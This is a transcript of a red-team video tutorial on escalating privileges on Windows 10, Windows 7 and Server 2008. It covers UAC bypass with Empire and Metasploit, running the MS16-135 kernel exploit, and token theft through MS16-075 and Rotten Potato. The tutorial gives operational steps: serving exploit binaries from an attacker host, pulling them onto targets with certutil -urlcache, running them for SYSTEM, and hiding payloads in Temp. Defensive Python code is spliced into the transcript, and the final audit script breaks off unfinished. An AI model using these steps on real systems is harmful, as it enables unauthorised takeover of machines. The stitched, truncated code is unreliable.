Windows Red Team Privilege Escalation Techniques - Bypassing UAC & Kernel Exploits

Captions
Hello everyone, welcome back to the Red Team training series. In this video we are going to be taking a look at privilege escalation on Windows. So again, we're focused on the privilege escalation tactic now, and we are going to be taking a look at various techniques that you can utilize to elevate your privileges on Windows systems, given that this series was targeted towards Windows systems.

In regards to what we will be covering exactly: we'll start out by taking a look at the privilege escalation techniques that we will be exploring. We'll then take a look at each individual technique within the practical section of this video. So we'll start off by bypassing User Account Control to elevate our privileges, and we'll talk about kernel exploits and impersonation attacks. The reason why I'm covering these techniques as opposed to any others is primarily because these will provide you with the best chance of actually elevating your privileges; these particular techniques have been known to work as opposed to fail, based on tests that have been performed in various environments. So again, these are pretty much the ones that I think are very important to begin with before you start exploring the process of exploiting Windows services in order to elevate privileges, and I'll probably make a video covering that. That being said, let's explore these techniques a little bit in depth.

All right, so when we talk about bypassing User Account Control, these are the descriptions that I got from the MITRE website, and the reason I'm using them is just to have an accurate picture of what exactly these techniques entail. So when we talk about bypassing User Account Control: adversaries bypass UAC mechanisms to elevate process privileges on a system. The User Account Control feature on Windows allows a program to elevate its privileges, and of course this is facilitated by the tracking of processes and their integrity, ranging from low to high, in order to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. So again, as I said before when we actually covered bypassing User Account Control with Empire, I mentioned basically how it works, and as I said before, what we are trying to do is essentially utilize UAC mechanisms to elevate the process privileges on a system.

All right, so when you talk about kernel exploits: kernel exploits are essentially when you identify vulnerabilities within the Windows kernel for that particular target, and then of course you exploit those vulnerabilities in order to elevate your privileges, right? And of course the description gives you an idea of what's going on here: adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Now the description from the MITRE website is also referring to applications or third-party solutions that may have vulnerabilities within them that could provide you with elevated privileges; however, in this case we are going to be focusing on kernel exploits, primarily because again they will actually provide us with the best chance of actually elevating our privileges.

You then have token impersonation. Token impersonation is a fairly simple technique to understand, and I'll just go through the description really quickly: adversaries may duplicate, then impersonate, another user's token to elevate their privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken. The token can then be actually utilized using the ImpersonateLoggedOnUser privilege to allow the calling thread to impersonate a logged-on user's security context. All right, so what's happening here is we're essentially finding impersonation or delegation tokens that we can utilize and then impersonating them in order to obtain their privileges. So for example, if we find an NT AUTHORITY\SYSTEM token, we can impersonate that token to obtain its permissions, and of course its permissions are essentially root or administrative privileges. So again, we're able to obtain administrative privileges; we've been able to elevate our privileges, right?

So these are the three techniques that we'll be looking at, and of course you can take a look at the MITRE ATT&CK privilege escalation tactic on the website. You can see I've highlighted the techniques that we'll be covering: Abuse Elevation Control Mechanism, Access Token Manipulation, Exploitation for Privilege Escalation, etc. And of course I will be covering additional techniques within this particular tactic in the future.

That being said, let's take a look at our target environment, or the environment we'll be using to perform our privilege escalation techniques. So we'll start off with a Windows 10 virtual machine, or the Windows 10 target, Windows 7, and also Windows Server 2008 R2. Again, the reason I'm doing this is to give you a feel for how various versions of Windows operate in regards to particular techniques and what techniques work best on each of them, and we'll go through this dynamically. All right, so that's pretty much it in regards to the theoretical aspect of this video. Now that we have all of that out of the way, let's actually get started with the practical aspect of this video, so I'll see you back on my Kali VM.

All right, so I'm back on my Kali VM, and the first technique that we're going to utilize is bypassing User Account Control. I'm going to be doing this on my Windows 10 target, and I have already received a ping back from the Windows 10 target on Empire. This is Starkiller, so you can see Windows 10, and I can interact with it. However, if you actually notice our privileges, we can see that this is not a high-integrity agent, and that means that we don't have administrative privileges. So that is going to be the goal, and we'll do that by utilizing the bypass User Account Control module, and we'll also replicate the technique with Metasploit so that I can show you how it's done manually.

So again, I've also retrieved a Meterpreter session on the Windows 10 target system. If I just type in sysinfo, you should be able to see that we are running on the Windows 10 system. I'm just going to wait for that to load. There we are, we can see Windows 10, and our objective now is to elevate our privileges to NT AUTHORITY\SYSTEM, or to the administrative level, right? So that is going to be the objective.

So we'll start off with Starkiller, or Empire if you will. As I mentioned before, if you click on an agent here (and you can also do this through the Empire client), if I click on view, you can try and enumerate whether this is a high-integrity agent or not. I'll just do this through the Empire client here, so I'll just list out my agents and I'll say interact, and I'll specify Windows 10. If I display the info here, you can see under "high integrity" the value is set to zero, which means we don't have admin privileges here.

So the module that we are going to be using: I'll click on interact, and we'll be using an Empire module, and the module is going to be bypass UAC, right? We're looking for the powershell/privesc/bypassuac module, so I'm going to click on that. We need to provide a reverse listener so that we can actually get our high-integrity agent, because it is going to execute and then we're going to get a new agent on the same target with elevated privileges. So I'll specify my listener, HTTP; we'll just use that. You can provide any obfuscation methods here based on the type of obfuscation you want to perform. As I've already mentioned before, we've covered defense evasion, and you can apply those same techniques, but in this case it is already going to be assumed that you have access to the target and you have evaded the antivirus system in place. That being said, that's pretty much all that we need to provide here, so I'm going to submit that, and you can see it's going to say "module execution queued for Windows 10".
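From the defender's side, the artifact of the bypass just queued is a high-integrity process that no consent prompt preceded. The Python script below is an added detection example (not code from the video, Empire or Metasploit): it reads constructed JSON-lines records modelled on Sysmon Event ID 1 process-creation events (the field names are Sysmon's, every value is invented) and flags a child process whose integrity level exceeds its parent's when no consent.exe start was logged within a short window beforehand. The window length and the single global window are assumptions; a production rule would also match the logon session and handle PID reuse.

```python
"""Flag integrity-level jumps that no UAC consent prompt preceded.

Added detection example for the UAC-bypass section of the video; it is not
code from the video, Empire or Metasploit. Input is constructed JSON-lines
records modelled on Sysmon Event ID 1 (process creation); the field names are
Sysmon's, every value is invented.
"""
import json
from datetime import datetime

# Windows integrity levels, low to high (unknown levels rank 0).
RANK = {"Low": 1, "Medium": 2, "High": 3, "System": 4}
CONSENT_IMAGE = "consent.exe"  # the process that draws the UAC prompt

# Constructed sample: explorer (Medium) launches a prompted elevation of cmd
# (consent.exe seen 4 s earlier) and, later, an unprompted elevation of
# PowerShell, which is what a UAC bypass looks like on the sensor.
SAMPLE_LOG = r'''
{"UtcTime": "2024-01-01 09:59:00", "ProcessId": 200, "ParentProcessId": 150, "Image": "C:\\Windows\\explorer.exe", "ParentImage": "C:\\Windows\\System32\\userinit.exe", "IntegrityLevel": "Medium", "User": "EXAMPLE\\user"}
{"UtcTime": "2024-01-01 10:00:00", "ProcessId": 500, "ParentProcessId": 100, "Image": "C:\\Windows\\System32\\consent.exe", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "IntegrityLevel": "System", "User": "NT AUTHORITY\\SYSTEM"}
{"UtcTime": "2024-01-01 10:00:04", "ProcessId": 501, "ParentProcessId": 200, "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\explorer.exe", "IntegrityLevel": "High", "User": "EXAMPLE\\user"}
{"UtcTime": "2024-01-01 10:05:00", "ProcessId": 600, "ParentProcessId": 200, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "IntegrityLevel": "High", "User": "EXAMPLE\\user"}
'''


def parse_events(lines):
    """Parse JSON-lines process-creation records and sort them by time."""
    events = [json.loads(line) for line in lines if line.strip()]
    for e in events:
        e["_t"] = datetime.strptime(e["UtcTime"], "%Y-%m-%d %H:%M:%S")
    return sorted(events, key=lambda e: e["_t"])


def find_unprompted_elevations(events, window_seconds=10):
    """Return (Image, ParentImage, User) for each child that runs at a higher
    integrity level than its parent without a consent.exe start in the
    preceding window. Assumptions: PIDs are not reused within the log and a
    single global window is enough (a real rule would also match the session).
    """
    level_by_pid = {}
    consent_times = []
    flagged = []
    for e in events:
        level_by_pid[e["ProcessId"]] = e["IntegrityLevel"]
        if e["Image"].lower().endswith("\\" + CONSENT_IMAGE):
            consent_times.append(e["_t"])
            continue
        parent_level = level_by_pid.get(e["ParentProcessId"])
        if parent_level is None:
            continue  # parent started before the log window; nothing to compare
        if RANK.get(e["IntegrityLevel"], 0) <= RANK.get(parent_level, 0):
            continue  # no elevation across this parent/child edge
        prompted = any(
            0 <= (e["_t"] - t).total_seconds() <= window_seconds for t in consent_times
        )
        if not prompted:
            flagged.append((e["Image"], e["ParentImage"], e["User"]))
    return flagged


if __name__ == "__main__":
    hits = find_unprompted_elevations(parse_events(SAMPLE_LOG.splitlines()))
    for image, parent, user in hits:
        print(f"unprompted elevation: {user} {parent} -> {image}")
```

A medium-to-high jump on its own is not the signal: a prompted elevation is reparented under the requesting process, so the elevated cmd.exe above also has explorer.exe as its parent. What distinguishes the two records is the absence of a consent.exe start, which is exactly what the auto-elevation abused by a bypass never produces.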
We can then click on the agent here and view the running tasks, so I'm just going to load this here, and let's see whether we'll actually get a callback, or whether we'll actually get a high-integrity agent that connects back. Alternatively, you can also use the Empire client here in the terminal: again, I'll just say agents, and then I can say interact Windows 10, and I can also display the history of commands that we executed here. So I'm just going to wait for this to execute successfully.

All right, so it looks like the module actually executed successfully, and we get back our high-integrity agent. I can hover over it and you can see that this is an elevated process. So I can click on that, and I'm just going to rename this to win10 priv, or we can just say "high integrity"; I'm just going to get rid of the hyphen there, "win10 high", just to keep things nice and simple so that we actually have an understanding of what system we're dealing with. You can see that that is now privileged, and we've been able to successfully elevate our privileges to the highest level with Empire.

Now let's take a look at how to replicate the same privilege escalation technique using Meterpreter, or manually. This will work if you have a Meterpreter session on the target, which I'm guessing you do. The first thing we want to do is just verify our privileges, which you can see here are standard. What I'll do now is I'll just put this in the background, and I will then list out my sessions; you can see the session ID is set to one here, and you can actually get information regarding this particular Meterpreter session here. The first thing I want to do, ideally, is to actually migrate this particular Meterpreter session, or the process rather. So I'll just list out the processes on the target system, and I'll migrate this to explorer.exe; that's under PID 4040, you can see it there. So I'm going to say migrate 4040 and hit enter. That's going to migrate me to a 64-bit Meterpreter session, which is actually quite useful when running post-exploitation modules with Metasploit. You can see "migration completed successfully". I'm then going to say sysinfo, and you can see we're running now on a 64-bit Meterpreter session.

So I'm just going to put this in the background now, and we want to search for bypass UAC. There are going to be multiple modules based on the actual exploitation technique and the various Windows components that you're going to be targeting. So in this particular case you can see that we have, as I said, multiple ones. This particular module is just a standard Windows escalate UAC protection bypass. You can also do it in memory, which is what I recommend, primarily because, number one, you'll evade any antiviruses if there are any antivirus systems in place, and secondly, you never ever want to interact with a Windows service like, for example, the Event Viewer unless you know how to clean up your mess. So we'll use exploit/windows/local/bypassuac_injection_winsxs, as that works really well on Windows 10 systems. So I'll use that module there, and I'm going to set the correct payload for the target operating system architecture, so I'll set the payload to windows/x64/meterpreter/reverse_tcp, right? We can then also show the various options here. You can see that the exploit target is set to Windows x86, so I'm going to say set target Windows x64, because the target is a 64-bit operating system. We then want to set the LHOST and the LPORT and the session; in my case I'll leave the LHOST and the LPORT there, I'll set the session to session one, and then I just hit run, and let's see whether we're able to elevate our privileges successfully.

All right, so we get a Meterpreter session here, and we can type in getuid. You can see we're still MSEDGEWIN10\IEUser, so we are currently the IEUser, which again is not privileged. However, we can actually check what privileges we have by typing in getprivs. So I'll just type in getprivs there, hit enter, and you can see we have all the privileges associated with an administrator account, right? And one of the key ones that we'll be exploring later is SeImpersonatePrivilege, which is used to impersonate Windows access tokens, so we'll actually take a look at that technique. That being said, you can actually see that we have been able to elevate our privileges successfully, and this was how to elevate your privileges by bypassing User Account Control on Windows 10. So let's move on to the next technique, which will be utilizing kernel exploits. I'll see you once I've set up the target system.

All right, so the next technique we're going to be taking a look at is kernel exploits, and our target system is going to be a Windows 7 system. You can check out the system information here. I've already obtained an initial foothold on the target system, and the first order of the day is to actually migrate our process into a 64-bit process so that we can obtain a 64-bit Meterpreter session. So similarly, we'll just print out the process tree here, and we'll look for Explorer, as it provides us with the best option in terms of a stable process to migrate to, as Explorer will never be forced to shut down or restart under normal use cases. So we'll say migrate, and then explorer.exe is 1864, that's the process ID, so one-eight-six-four, hit enter, and we're going to migrate to that process. Then of course I'll try and print out the system information and let's see whether that is successful, so sysinfo, and you can see we're running on a 64-bit Meterpreter session.

All right, now this particular technique I'm going to handle in a manual way. We're not going to be using Empire, primarily because we can't perform kernel exploitation with Empire; we can only do it using a manual command shell. And we're not going to be using any tools or utilities that we will be transferring over to the target system, apart from the kernel exploit itself. So the first part of privilege escalation is to perform local enumeration of the target system, and of course in the context of kernel exploitation the information that's important to us is the operating system version, the build number, the service pack and the architecture, as well as the updates or hotfixes that have been installed on the target system. So if I just spawn up a shell session here, and let's see if we actually get a shell session. There we are. So I'm just going to type in systeminfo, and this is a native Windows command, and I'll hit enter. This command will display all relevant information pertinent to this particular operating system or target, right? If we take a look from the beginning of the results, we can see that it's Windows 7 Ultimate, the OS version is 7601 Service Pack 1 build 7601. The other information that is useful in this case is going to be the hotfixes installed, and it's going to provide you with the hotfix IDs that will tell you either what kernel exploits will work or what kernel exploits won't work, based on what has been patched and what hasn't been patched.

So the process of identifying kernel exploits can be done manually, or automatically through the use of a tool called Windows Exploit Suggester. The link to this GitHub repository will be in the description of this video, or in the documentation of this video. All you need to do is clone the repository; it's a Python script, and the way it works is fairly simple. It's a tool that you run on your Kali VM, not on the target. So you can see it's a Python script that you actually execute, and it is a Python 2 script, so it's vital that you install all the dependencies, right over here as you can see. It does come with a requirements file, or you can essentially install the dependencies manually by following the instructions here. The first thing you need to do is just run the tool to obtain an initial vulnerability database, and what this database is, is essentially a list of all Windows exploits or vulnerabilities. The next piece of information that you need to obtain is this information right here: you actually need to copy out the output of the systeminfo command from the target system. So I'll just copy it right over here, and you need to paste it into a file. So I'm just going to open up my text editor, I'm then going to paste this into a file, and I'll save it on my desktop here, and I'll just call it, let's see, we'll just call it Windows 7, Windows 7.txt, right? I'll hit save, and there we are, that's going to save it.

Now we can run the tool on Kali, the Windows Exploit Suggester. Let me just stop serving that, and I'll just head over onto my desktop where I've cloned the repository, so this is under windows-enum and Linux, sorry, Windows Exploit Suggester. There we are, that's the tool, and you can see we have the script here. All right, so now in terms of running the tool, as I said, we need to run the tool with Python, and then provide the database file that you can get by running the update command, and then you provide the systeminfo information that you just copied and pasted into a txt file, and then you hit enter. It's going to utilize the system information file and cross-check with the vulnerability database to identify any potential vulnerabilities that we can exploit, and in our case we're looking for kernel vulnerabilities that will elevate our privileges, right? So we will run this, and I'm just going to run it here. So we'll say windows-exploit-suggester; I already have my database and it's quite up to date. Then I'm going to specify my database option, so I'll say --database, and then I specify the file, so there's the database file. Then we have to provide the --systeminfo option, and then we provide the file containing the actual system information we just copied over; in our case it is on my desktop and it is called Windows 7.txt. We're going to hit enter, and we want to give that a few seconds to generate or to display all the vulnerabilities that affect this particular version of Windows.

I just want to highlight one thing: the output of this particular tool is color-coded, in that when you have a green output, that means that it's a positive result for a vulnerability. In this case the vulnerability is outputted in terms of the vulnerability code, the Microsoft vulnerability code; it also provides you with exploit links to the exploit code, and a reference link that will actually tell you more about what this particular exploit does or what it's exploiting particularly, right? So let's try and identify one here that will provide us with privileges, or will actually elevate our privileges. Right over here I can identify one that looks quite interesting and might be able to help us: you can see "security update for secondary logon to address elevation of privilege", and it provides us with exploit code, and it looks like there are a few versions of the exploit code based on the target operating system. So we can see that we have Windows 7 to 10 and Server 2008 to 2012, both architectures, 32-bit and 64-bit. But let's see if we can find any more information regarding this particular vulnerability.

All right, so let's actually see what we can find. What we can do is just copy that particular vulnerability code here, and we can use Google or some Google dorks, so I'll just open up Google here, there we are, and we'll just paste that in there, and then we'll limit the output to Exploit-DB, or to only show results from exploit-db.com, and we can see what this particular exploit does. So we'll click on the first link here, as that's pertaining to our version of Windows, and let's see what it does. You can see that this is the partial implementation of MS16-032; the exploit targets all vulnerable operating systems that support PowerShell version 2. The way it works, you can see that it requires two or more CPUs to work, and you can learn more about this particular exploit by clicking on the reference link. This write-up was done by the Google Project Zero security team, so I'll just open that up, and let's see what this particular exploit pertains to, or what it's actually exploiting. So it looks like it's exploiting the secondary logon handle, and it says right over here: "Once in a while you'll find a bug that allows you to leak a handle opened in a privileged process into a lower privileged process. I found just such a bug in the Secondary Logon service on Windows, which was fixed this month as MS16-032. The bug allows you to leak a thread handle with full access." All right, so that gives you a bit of a description; you can go through the entire write-up as to how that is done.

We can also take a look at a few other exploits that were actually displayed here. Through my usage of this tool, the best options, or the best exploits that have the highest chance of success, are going to be the ones at the top here. So for example MS16-135: it actually looks like this is a security update for Windows kernel-mode drivers, and this is a kernel exploit, as opposed to this particular one here. Let me just open that up: this particular exploit isn't a kernel exploit, this is essentially exploiting the secondary logon handle. So what we can do is, I'm just going to reopen that tab, and we'll head back over to Google, and let's see whether we can gather more information regarding this vulnerability, as it directly targets the kernel. You can see this particular exploit code provides us with, or performs, privilege escalation, or will provide us with elevated privileges, right? So what we can do is go back, and I'm just going to remove that particular exploit or vulnerability code there, and let's see what this one pertains to. So we can again see that it provides us with the source or a reference link, the binary link (these are going to be the compiled binaries), and a mirror to that particular executable that we can utilize. We can also learn more about what's happening here, but let's actually try out this particular exploit.

So when it comes down to downloading exploits, I recommend utilizing Exploit-DB, and of course I also recommend compiling the code yourself into an executable or a binary instead of downloading pre-built binaries. The reason I'm saying this is because pre-built binaries may have malicious code, unless they're coming from a trusted source like Offensive Security, right over here. Now I also want to make one thing clear: whenever you're targeting the Windows kernel, you're essentially playing around or mucking about with the core of the Windows operating system, and of course the Windows kernel is Windows NT. That means that if you make a mistake, or there's an issue with your code when you execute your exploit code, you may actually cause the operating system to crash, which can cause data loss, and it can raise certain alarms, so on and so forth. So you have to be really careful about what you're executing on the target, and you should perform research on the kernel exploits that you're utilizing. Now in this case I've already used this before, and I know that it doesn't cause any issues, and I'm familiar with the source code; I've compiled the binaries many times, so I can almost guarantee that if you run this particular exploit on a Windows 7 target you'll not have any issues in regards to the stability of the target system, right?

So what we're going to do is, if we go back into Kali here, you can see that it provides us with the exploit code, so we can actually download the code from Exploit-DB, or the pre-built binary as it were, and we can then transfer it over to the target. But before we do that, we also need to learn about how this works, right? So what I'll do is, we can just take a step back here, and we can just open that up in a new tab, and we'll say "ms16 135 exploit", and let's see whether we get any links. All right, so it looks like we get a link to a GitHub repository here, and if we click on the actual exploit or vulnerability code there, you can see that it provides us with a pre-built binary (that's going to be the executable here) and the C code that you can actually compile yourself, right? I will be covering how to compile Windows exploits in the future; this is beyond the scope of this video. But you also have the PowerShell scripts, so it looks like this will work on all 64-bit vulnerable targets; you can execute it with PowerShell or you can also use the executable. The way you utilize this exploit, and I'll just show you how it works, is you need to run the exploit binary on the target and then provide the version of Windows that you're trying to exploit. So if it's Windows 7, you provide the 7 option; if it's 10, so on and so forth, so it's fairly simple to understand. So we can actually download this from the GitHub repository, or we can utilize the official source here, which is going to be from Offensive Security's Exploit-DB, but in our case we'll just download it from here, as I know that this is a trusted source. So I'll just click on it here, we can then say download, and I will save it in my downloads directory. Now what I will do is, I'm just going to move it from my downloads directory, or we can actually leave it within the downloads directory; I'll just change my directory into the downloads folder, and we can see it there.

So now we need to transfer it over to the target. Now given that we're utilizing manual techniques, there are two ways we can go about doing this. One of them is by uploading it using Meterpreter: if I head back over into my Meterpreter session, I can utilize the upload functionality, and then specify the exploit that I want to upload and the directory that I want to upload it into, and then execute it that way. Alternatively, I can also utilize the certutil utility to transfer files. So I'll actually take you through both; I'll take you through the manual process. However, there is one thing that we're missing out: remember, we currently are an unprivileged user, right? So if I say getuid here, you can see that we're currently the user whose user name is simply called "user". So, if I list out my current working directory, we're in the System32 directory, so we need to head back over to the root of the C drive, and then Users, there we are, hit enter, and then cd user, and we can then save the files here, as this particular user will have the necessary privileges to save files to this particular user directory. So we will save them in our downloads folder. Of course, whenever you're transferring exploit code onto the target, you want to do this in a folder that is not frequently accessed by users on the target system, so that your payloads are not detected. Another way of actually going about doing this is by going to the root of the C drive and taking a look at the Temp directory. The Temp directory is where you can store all your temporary files, and it's a folder that's not frequently accessed by users on a target system. So I'll just head over into the Temp directory, and we can now transfer the exploit over onto the target.

Now, in order to transfer the exploit over to the target, we need to set up a web server that will host that exploit code for us, and we can do that on Kali using the SimpleHTTPServer module. That's a Python module that allows us to set up an HTTP server in the directory that we're currently working in; in this case, the downloads directory, and you can see it has the exploit here. We'll just rename the exploit to something that's more identifiable; we'll just call it exploit.exe. Now again, I don't recommend doing that, or giving applications names like "exploit", as that can raise alarms; in this case we're just doing it so that we can easily identify it. So I'll say sudo python -m SimpleHTTPServer, and we'll run this on port 80. This is going to set up our web server within the downloads directory. Then on the target system we can open up a shell session; we are currently within the Temp directory, so if we list out the contents of the Temp directory, I have the shell that I actually utilized to gain access here. So what I can do, let me just head over into Meterpreter, let me just remove shell.exe, let me just make sure that that is out of there, and I'll then open up a shell here, and there we are, list the contents there, we don't have anything. So now we'll utilize certutil to download the file from our Kali web server. So we'll say certutil, and then we'll say -urlcache, and then we'll specify that we want to download it from the following IP address (this is going to be your Kali IP), and the name of the file is exploit.exe. We then need to provide the output file name, which is going to be just exploit.exe. Hit enter; it's going to download that from the target. Let's see whether the file is there; we can see we have exploit.exe. So now we can try and run the code. I'm just going to say exploit.exe, and you can see that it provides you with instructions as to how to run this particular kernel exploit, and in our case our target is running Windows 7, so we simply need to run the executable and provide the option 7, as it says here. So we'll do exactly that: I'm going to say exploit.exe 7, and given the fact that I have experience with this particular exploit, this exploit will take a few seconds to work, so you want to give it probably around 10 to 30 seconds. So I'm just going to hit enter and just give it a few seconds to execute.

All right, so once it executes successfully, we can then enumerate our permissions by simply typing in whoami. If I type in whoami, you can see NT AUTHORITY\SYSTEM, and we've successfully been able to elevate our privileges. So I can head back into my Meterpreter session, and if I say sysinfo and getuid, you can see it's still going to say that we're the current user, but we have NT AUTHORITY\SYSTEM privileges there. And yeah, we've been able to successfully elevate our privileges through a kernel exploit on a Windows 7 target system. So that is how to perform manual kernel exploitation, or how to utilize kernel exploits manually. As I said, I've not utilized any Metasploit modules; there are modules that exist that can be utilized to exploit the kernel, however, as I said, I'm not going to be covering that, because it's essential to know how to transfer exploits manually over to the target system, how to execute them, and of course verify that we have elevated our privileges. So that's going to be it in regards to using kernel exploits to elevate your privileges. The next technique we're going to be taking a look at is token impersonation, so I'll see you when I have the target set up.

All right, so we are now going to be taking a look at token impersonation, and we're going to be focusing on the process of utilizing impersonation attacks in order to elevate our privileges. Right now I'm going to be using a Windows 7 system, however under different parameters, and you'll understand why in a few seconds. So you can see it's a Windows 7 target, build 7601 Service Pack 1, and we're using a different user called "Windows 7", right? Let me just give you a brief explanation of what token impersonation attacks entail in relation to privilege escalation. So token impersonation attacks leverage specific Windows privileges, such as SeImpersonatePrivilege, in order to obtain an access token with administrative privileges that we can then impersonate in order to elevate our privileges. So if that's a bit confusing, let me explain what Windows privileges I'm referring to. For example, if I type in getprivs, this is going to get the privileges for this particular user, and you can see that it'll list out all the Windows privileges associated with this user. These privileges essentially classify or identify what this user can do, and if you take a look at a very interesting privilege here called SeImpersonatePrivilege, that is the privilege that we're going to try and exploit in order to impersonate an access token that of course has administrative privileges; in this case we're going to try and impersonate the NT AUTHORITY\SYSTEM access token. Now the question is, how exactly do we get those impersonation tokens? That's the key thing here that you need to take away from all of this. Now there are multiple techniques that we'll be utilizing, and this will depend on the version of Windows you are targeting, and in this case we'll be taking a look at potato attacks, more specifically the Rotten Potato attack. However, I'm just going to give you a basic overview of how this works. Before I do that, however, if we take a look at the vulnerabilities that we were able to enumerate for the Windows 7 target, let me just try and identify the actual vulnerability that I was talking about, or that I actually want to highlight here, that has to do with a particular potato attack. Hopefully I can find it here; it's not too difficult. Let's see, we're looking for the potato attack. Right there it is, I think I can actually see it now. So there we are, that's MS16-075, security update for Windows
SMB server right and you can see it actually provides a description so this is Hot Potato Windows privilege escalation and you can learn more by actually utilizing this particular write-up and it's a very good write-up it actually explains what's going on right and it is quite a sophisticated attack in the sense that in order to obtain the privileged uh or the uh yeah the privileged access token there needs to be a few things done so you can see that the potato attack works by taking advantage of known issues in um in Windows to gain local privilege escalation in default configurations namely utilizing the ntlm relay specifically the HTTP SMB relay and nbns proofing so again just to simplify what's going on here what we're trying to do is we're trying to exploit their vulnerability with within windows and we're getting a process and in this case let me just see if I can find that step because that's very important here um there we are so the fake wpad proxy server in Windows Internet Explorer by default will automatically try to detect Network proxy setting configuration by accessing the following URL this also surprisingly applies to some windows services such as Windows update right and the URL does not exist on the fake proxy server that will set up or that this exploit sets up so what will happen is with nbns spoofing we can Target our nbns spoofer at localhost we can then flood the target machine with our own nbns response packets and essentially get the privileged access token to uh to actually be sent to our fake um to all fake wpad proxy server here right so what's happening is fairly simple we're essentially intercepting uh the um the privileged access token and again once we obtain it we can then utilize it uh to impersonate that particular access token so that's uh the a very simplistic explanation of what what is going on here if you want to learn more about this I'll probably make a video that explains each step of what's going on and as I said it's a 
fairly complicated exploitation process but luckily for us uh windows or interpreter actually has or Metasploit rather actually has a pre-built module that allows us to exploit this very um this very vulnerability right and obtain our impersonation uh token right or retrieve our privileged access token that we can impersonate so we will also be utilizing a module that's inbuilt into an interpreter called Incognito so if I say load Incognito and then I I list the tokens right here for all the users you can see that we currently have delegation tokens that we can utilize like the anti-authority system token here but that is from a previous exploitation that I had performed but I'll still take you through the process of retrieving the um this particular access token because right now we can essentially impersonate that token by typing in impersonate token and then providing the token that we want to impersonate but I'll take you through the process of running the module first so I'll just put this in the background and we can then search for ms16 075 right we hit enter and we have the module for that particular vulnerability and it's going to exploit it so you can see Windows net ntlmv2 reflection and we just copy it and I'm gonna paste it in there and we need to set the correct payload so payload uh windows x64 meterpreter reverse TCP right and we show the options here we need to set uh the session so let me just list out my sessions here so set session two there we are and I'll leave the lhost and the airport options as are because I don't need to actually change the L Port here because I don't have anything running so I'll just hit run and let's see all right so it's going to run the exploit and it's going to give us a new interpretive session if I say get uid now you can see it's still going to say win 7 PC win 7 and if I say get cribs it's going to give us the same privileges that we had before if I open up a shell session and I say who am I it's the same thing 
so you might be asking yourself well that didn't work what's going on here why don't I have uh administrative privileges well that's because what this exploit does is actually provides us with the impersonation token so if I now say list tokens um sorry uh we haven't loaded Incognito here but let me just say load Incognito and then list tokens you can now see that we'll have the NT Authority system token here that we can impersonate right so again this is a delegation token but we can use it the same way uh so I'll say impersonate token and I'll paste that in there and that way it's going to say successfully impersonated user token and if I say get uid we now have NT Authority system privileges here and we've been able to successfully Elevate our privileges now as I said this exploit can be performed manually by of course taking a look at potato attacks more specifically rotten potato so for example I'll just search for it here uh rotten potato and I'll click on the first link here this is the best vector or exploit that you can actually utilize so you can see local privilege escalation from Windows service accounts to system so the usage for the usage for this exploit is simple you compile it you get a metabolous shell on the target system you load Incognito you run the binary and then you impersonate empty Authority system right so again they already have the pre-built binary here and I think I can actually take you through the process by utilizing a non-privileged session but again you do require the SE impersonate privilege otherwise you will not be able to impersonate any access tokens that you are able to retrieve so let me just explain a little bit about rotten potato attacks because they are slightly different and of course this is going to be much much more manual if we take a look at um I already have the exploit code I believe on my on my Kali VM you can actually take a look at the source and compile it yourself but we'll be utilizing the pre-built 
binaries here and we need to transfer it onto the Target and then what we need to do is essentially run it and we should be able to retrieve a system access token or anti-authority system access token and then impersonate it so what I'll do is let me just um put this in the background right and we'll head over into our unprivileged session so sessions two right and what's my current working directory I'll head over into the uh the C drive and we'll head over into temp uh right and within here we add the earlier kernel exploit that we utilized uh no problem there if I check out my um let me just clear that out if I head over into my desktop uh Windows exploits and within this here we should have the potato folder here we are and we have the rotten potato exe so I'll again utilize uh the simple HTTP server so simple HTTP server and I'll Host this on Port 80. and now we can transfer it using cert util so I'll just open up shell here and we'll say set util URL cache and then we specify the Kali IP here 192 168.2.21 and this is rotten uh potato dot exe right and we'll save it as potato.exe just to keep the name shorter and will it enter and we'll wait for that to transfer and it looks like it transferred successfully so now in terms of running the exploit all you need to do is simply run potato dot EXE we hit enter give that a few seconds it's going to start the relay and it's going to say uh it again it's going to start the relay and then it's going to receive the challenge the ntlm authentication Challenge and with that ntlm authentication challenge you get the access token and then it's going to say right over here got type 3 message auth token relay you are now system decom connection uh terminated and let's see whether we actually got anything here so I'm just going to wait for it to complete uh and let's see whether we were able to get anti-authority system privileges all right so it completed running and now if I list out the tokens uh you can see that again 
it'll still display the same things but we have the anti-authority system token here and we can then impersonate it uh so again I'll just say impersonate there we are let's see if it successfully is able to impersonate the as uh impersonally the use entity Authority system there we are if we type in a shell and who am I and the authority system and that is how to perform uh potato attacks manually and automatically using a Metasploit module and of course we've been able to elevate our privileges successfully so that is uh in general how to again perform token impersonation attacks on Windows um so that's pretty much all that I wanted to cover in this video as I've mentioned in the uh in within the slides there are many other techniques that you can utilize but these are the techniques that are the most stable across board and again you will have to change your approach based on the version of window you're targeting as I said with Windows 10 it's very difficult to actually find vulnerabilities that again can allow you to to obtain access tokens like this but it's not impossible and you can try out the other techniques listed out under the privilege escalation tactic on the miter attack website that being said that's going to be it for this video and I'll be seeing you in the next video
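The video's token impersonation section hinges on SeImpersonatePrivilege being present on the compromised account. As an added defensive example (not code from the video or from HackerSploit), the Python below parses `whoami /priv` output and flags the impersonation-enabling privileges so an administrator can review which service accounts hold them; the sample `whoami /priv` output embedded in it is constructed, and the two-privilege watch list is an assumption of this example.

```python
# Added audit example (not the video's code): flag the privileges that enable
# token impersonation in `whoami /priv` output. Sample output is constructed.
import re

# Privileges that let a process impersonate or assign another account's token;
# accounts holding these (typically service accounts) are the ones to review.
IMPERSONATION_PRIVS = {
    "SeImpersonatePrivilege": "impersonate a client after authentication",
    "SeAssignPrimaryTokenPrivilege": "replace a process level token",
}

# Constructed sample in the `whoami /priv` table layout (not real host output).
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# One table row: privilege name, free-text description, then the State column.
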